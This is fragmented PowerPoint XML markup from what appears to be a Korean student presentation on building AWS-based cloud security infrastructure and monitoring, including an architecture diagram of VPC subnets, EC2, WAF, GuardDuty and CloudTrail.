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5" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId53"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="271" r:id="rId2"/>
    <p:sldId id="272" r:id="rId3"/>
    <p:sldId id="275" r:id="rId4"/>
    <p:sldId id="273" r:id="rId5"/>
    <p:sldId id="298" r:id="rId6"/>
    <p:sldId id="341" r:id="rId7"/>
    <p:sldId id="296" r:id="rId8"/>
    <p:sldId id="297" r:id="rId9"/>
    <p:sldId id="299" r:id="rId10"/>
    <p:sldId id="303" r:id="rId11"/>
    <p:sldId id="306" r:id="rId12"/>
    <p:sldId id="307" r:id="rId13"/>
    <p:sldId id="308" r:id="rId14"/>
    <p:sldId id="304" r:id="rId15"/>
    <p:sldId id="311" r:id="rId16"/>
    <p:sldId id="332" r:id="rId17"/>
    <p:sldId id="309" r:id="rId18"/>
    <p:sldId id="323" r:id="rId19"/>
    <p:sldId id="342" r:id="rId20"/>
    <p:sldId id="312" r:id="rId21"/>
    <p:sldId id="301" r:id="rId22"/>
    <p:sldId id="343" r:id="rId23"/>
    <p:sldId id="331" r:id="rId24"/>
    <p:sldId id="279" r:id="rId25"/>
    <p:sldId id="334" r:id="rId26"/>
    <p:sldId id="335" r:id="rId27"/>
    <p:sldId id="336" r:id="rId28"/>
    <p:sldId id="337" r:id="rId29"/>
    <p:sldId id="338" r:id="rId30"/>
    <p:sldId id="333" r:id="rId31"/>
    <p:sldId id="280" r:id="rId32"/>
    <p:sldId id="344" r:id="rId33"/>
    <p:sldId id="292" r:id="rId34"/>
    <p:sldId id="294" r:id="rId35"/>
    <p:sldId id="283" r:id="rId36"/>
    <p:sldId id="28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39" r:id="rId45"/>
    <p:sldId id="340" r:id="rId46"/>
    <p:sldId id="287" r:id="rId47"/>
    <p:sldId id="324" r:id="rId48"/>
    <p:sldId id="325" r:id="rId49"/>
    <p:sldId id="326" r:id="rId50"/>
    <p:sldId id="345" r:id="rId51"/>
    <p:sldId id="265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Pretendard" panose="02000503000000020004" pitchFamily="50" charset="-127"/>
      <p:regular r:id="rId58"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Pretendard Black" panose="02000A03000000020004" pitchFamily="50" charset="-127"/>
      <p:bold r:id="rId59"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Sandoll 삼립호빵체 Outline" panose="00000500000000000000" pitchFamily="50" charset="-127"/>
      <p:bold r:id="rId60"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="나눔스퀘어_ac" panose="020B0600000101010101" pitchFamily="50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250"/>
    <a:srgbClr val="224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>
        <p:guide orient="horz" pos="218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D02698-A74E-4B34-A7B2-2DA3E30E7F31}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:pPr lvl="0">
                <a:defRPr/>
              </a:pPr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5061DFB-80DC-46D3-B153-6CE4021C75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839216f502_6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1839216f502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839216f502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1839216f502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39216f502_6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839216f502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39216f502_6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839216f502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5061DFB-80DC-46D3-B153-6CE4021C75D1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06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5061DFB-80DC-46D3-B153-6CE4021C75D1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5061DFB-80DC-46D3-B153-6CE4021C75D1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5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5061DFB-80DC-46D3-B153-6CE4021C75D1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3F66-C409-43A2-83E0-3DB5B11FE04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FE71-C379-43E8-8280-4B21F3983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6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2"/>
            <a:ext cx="11276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Public Cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="6000" spc="-150" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>기반</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="6000" spc="-150" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="6000" spc="-150" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>보안 인프라 구축 및 관제시스템 운영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250798" y="2685617"/>
            <a:ext cx="131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K10ud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6654D3-33CA-AF00-65A0-55620F6F5774}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8874990" y="3187565"/>
            <a:ext cx="275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Jungle &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2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ShineMusket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68205-2F10-FF0B-3692-3FD00DBCFB90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7762904" y="3778077"/>
            <a:ext cx="1901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1734008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이희주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1734009  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강태건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1734029  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이기범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1734038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황성현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1834022  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김찬우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1834029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1834034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국동혁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7C2C2-94C4-EF43-53E3-C8C3EE891C9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9664371" y="3772339"/>
            <a:ext cx="190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1434023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심형섭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1734030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이태혁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1834021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장영진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1834030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안대희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1834033  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양우찬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1834035   </a:t>
            </a:r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김호진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1934042  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장희윤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73517" y="872277"/>
            <a:ext cx="5594683" cy="4483771"/>
            <a:chOff x="6673517" y="310803"/>
            <a:chExt cx="5594683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673517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73517" y="3350782"/>
              <a:ext cx="55946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인프라 구축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3517" y="4543926"/>
              <a:ext cx="5518483" cy="199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3517" y="4785226"/>
              <a:ext cx="5518483" cy="9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7" y="1156356"/>
            <a:ext cx="2356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rgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Jungle</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="48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6" y="1987353"/>
            <a:ext cx="33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bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ShineMusket</a:t>
            </a:r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(RED)</a:t>
            </a:r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6" y="2819359"/>
            <a:ext cx="33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bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ShineMusket</a:t>
            </a:r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(BLUE)</a:t>
            </a:r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06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298607" y="2672718"/>
            <a:ext cx="5594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AWS CLOUD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765876" y="4096357"/>
            <a:ext cx="4660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왜 아마존 서비스를 채택했는가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B2C76-A441-FD8C-7954-A7DEDACAA9E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D38B0-5E65-D092-8052-C0AEB957FA01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163052" y="2727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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19319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8" y="1095800"/>
            <a:ext cx="7864664" cy="54595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54" y="1095799"/>
            <a:ext cx="5312943" cy="5459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84" y="1095798"/>
            <a:ext cx="4793130" cy="5460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148" y="1095799"/>
            <a:ext cx="5757599" cy="5459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3E3A1C-775B-9E5E-A27C-B299169746EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="144378" y="2727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AA3EE-09FE-C8D2-336B-CED52A412037}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163052" y="272716"/>
            <a:ext cx="6380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-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왜 아마존 웹서비스를 이용하였는가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509401" y="2672718"/>
            <a:ext cx="5173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AWS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="7200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>구성도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334947" y="4096357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AWS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>에서 사용한 기능들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C7B08-2A22-E640-F816-8F21A3E53E99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3F021-41E7-D118-0ACA-3854885358E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163052" y="2727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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113881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32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7458246" y="2266194"/>
            <a:ext cx="1685713" cy="1475849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8900">
              <a:alpha val="980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1E8900"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Public subnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9951415" y="2263814"/>
            <a:ext cx="1685713" cy="1475849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8900">
              <a:alpha val="98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1E8900"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Public subnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844069" y="177381"/>
            <a:ext cx="11221230" cy="65032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8" name="Graphic 3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518" y="172477"/>
            <a:ext cx="382022" cy="38202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01114" y="246886"/>
            <a:ext cx="1390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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>AWS Cloud</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9803682" y="1436171"/>
            <a:ext cx="1971735" cy="454150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/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Availability Zone C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4798569" y="1831204"/>
            <a:ext cx="7125137" cy="40148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n w="0"/>
                <a:solidFill>
                  <a:srgbClr val="1E8900"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>VPC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:srgbClr val="1E8900"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Graphic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848" y="1831029"/>
            <a:ext cx="381000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7562592" y="2592837"/>
            <a:ext cx="1544491" cy="469503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n w="0"/>
                <a:solidFill>
                  <a:srgbClr val="D86613"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>EC2 instance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Graphic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57897" y="2586725"/>
            <a:ext cx="284004" cy="28400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562375" y="3175900"/>
            <a:ext cx="1544708" cy="492399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n w="0"/>
                <a:solidFill>
                  <a:srgbClr val="D86613"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>EC2 instance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Graphic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58580" y="3168732"/>
            <a:ext cx="286136" cy="278992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Graphic 6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82198" y="671083"/>
            <a:ext cx="446466" cy="44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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3216144" y="1112470"/>
            <a:ext cx="1165086" cy="2667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RDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Freeform 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9099449" y="2707618"/>
            <a:ext cx="522702" cy="615693"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 622300"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1574800"/>
              <a:gd name="connsiteX1" fmla="*/ 622300 w 622300"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1574800"/>
              <a:gd name="connsiteX2" fmla="*/ 622300 w 622300"/>
              <a:gd name="connsiteY2" fmla="*/ 1574800 h 1574800"/>
              <a:gd name="connsiteX3" fmla="*/ 482600 w 622300"/>
              <a:gd name="connsiteY3" fmla="*/ 1574800 h 1574800"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 622300"/>
              <a:gd name="connsiteY4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00" h="1574800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622300" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="622300" y="1574800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="482600" y="1574800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1574800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0" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9626820" y="3010331"/>
            <a:ext cx="683858" cy="2577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086653" y="2815191"/>
            <a:ext cx="698484" cy="26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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>E-class</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Graphic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21488" y="3321870"/>
            <a:ext cx="360076" cy="3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12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5064912" y="3710292"/>
            <a:ext cx="47966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ELB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="TextBox 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1060760" y="3709402"/>
            <a:ext cx="1403350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 dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Amazon Ember"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Internet gateway</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Graphic 10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88045" y="32712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raphic 4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963457" y="328077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16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5588019" y="3708946"/>
            <a:ext cx="1243797" cy="546824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Elastic IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="900">
                <a:ea typeface="Amazon Ember"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>3.39.2.188</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:ea typeface="Amazon Ember"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(E-class)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>3.38.77.41</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>종합정보</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>)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61128" y="3429506"/>
            <a:ext cx="833690" cy="254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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>종합정보</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" b="1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3" name="Graphic 19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487222" y="1549653"/>
            <a:ext cx="460221" cy="46022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12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1477236" y="1991099"/>
            <a:ext cx="486876" cy="2644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IAM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65" name="Graphic 19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1485024" y="2271553"/>
            <a:ext cx="460221" cy="4602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12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1227604" y="2723219"/>
            <a:ext cx="976163" cy="4467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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr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GuardDuty</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Graphic 15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85817" y="4002312"/>
            <a:ext cx="468808" cy="46880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11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1467177" y="4460470"/>
            <a:ext cx="52065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SSM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71" name="Graphic 17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486199" y="4709614"/>
            <a:ext cx="468044" cy="46804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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1186019" y="5160994"/>
            <a:ext cx="1051532" cy="266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CloudWatch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="73" name="Graphic 8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490174" y="5447477"/>
            <a:ext cx="473247" cy="47324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11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091825" y="5883412"/>
            <a:ext cx="12399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AWS Config</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75" name="Graphic 20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485024" y="669733"/>
            <a:ext cx="453522" cy="45352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12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="959826" y="1121062"/>
            <a:ext cx="1583593" cy="4486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</a:t>
            </a:r>
          </a:p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Detective</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77" name="Graphic 8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5131696" y="2481834"/>
            <a:ext cx="371900" cy="3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11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4805765" y="2814532"/>
            <a:ext cx="10241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000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Amazon Ember"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>AWS WAF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79" name="Graphic 23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592214" y="4004773"/>
            <a:ext cx="474838" cy="47483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15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2069613" y="4479611"/>
            <a:ext cx="158145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AWS CloudTrail</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81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" y="323045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29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0E61288-9BAF-3A4C-B4BA-A8CAADFC4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32558" y="3651026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17" name="Freeform 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6992030" y="2727833"/>
            <a:ext cx="530520" cy="782051"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 622300"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1574800"/>
              <a:gd name="connsiteX1" fmla="*/ 622300 w 622300"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1574800"/>
              <a:gd name="connsiteX2" fmla="*/ 622300 w 622300"/>
              <a:gd name="connsiteY2" fmla="*/ 1574800 h 1574800"/>
              <a:gd name="connsiteX3" fmla="*/ 482600 w 622300"/>
              <a:gd name="connsiteY3" fmla="*/ 1574800 h 1574800"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 622300"/>
              <a:gd name="connsiteY4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00" h="1574800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622300" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="622300" y="1574800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="482600" y="1574800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1574800"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/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6" name="Graphic 8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2610203" y="2290076"/>
            <a:ext cx="450236" cy="45023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TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2323183" y="2738171"/>
            <a:ext cx="1024275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S3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="128" name="Graphic 7"/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2606170" y="670401"/>
            <a:ext cx="448716" cy="44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TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2349930" y="1117664"/>
            <a:ext cx="965832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AWS KMS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="130" name="Graphic 6"/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2617202" y="1547677"/>
            <a:ext cx="449217" cy="44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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2369582" y="1992653"/>
            <a:ext cx="91071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sz="1200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>AWS SSO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Amazon Ember"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="TextBox 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6053858" y="1051208"/>
            <a:ext cx="831848" cy="2708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Snapshot</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="133" name="Graphic 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr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6243242" y="60224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Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957826" y="4303763"/>
            <a:ext cx="1677424" cy="1110300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="007CBC">
              <a:alpha val="98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/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Private subnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="136" name="Graphic 2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959558" y="4300411"/>
            <a:ext cx="286251" cy="283881"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="138" name="Graphic 19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9957304" y="2263814"/>
            <a:ext cx="279619" cy="279619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="141" name="Graphic 23"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId25"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131302" y="5139872"/>
            <a:ext cx="357316" cy="35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TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4860309" y="5499275"/>
            <a:ext cx="935459" cy="270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CloudTrail</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
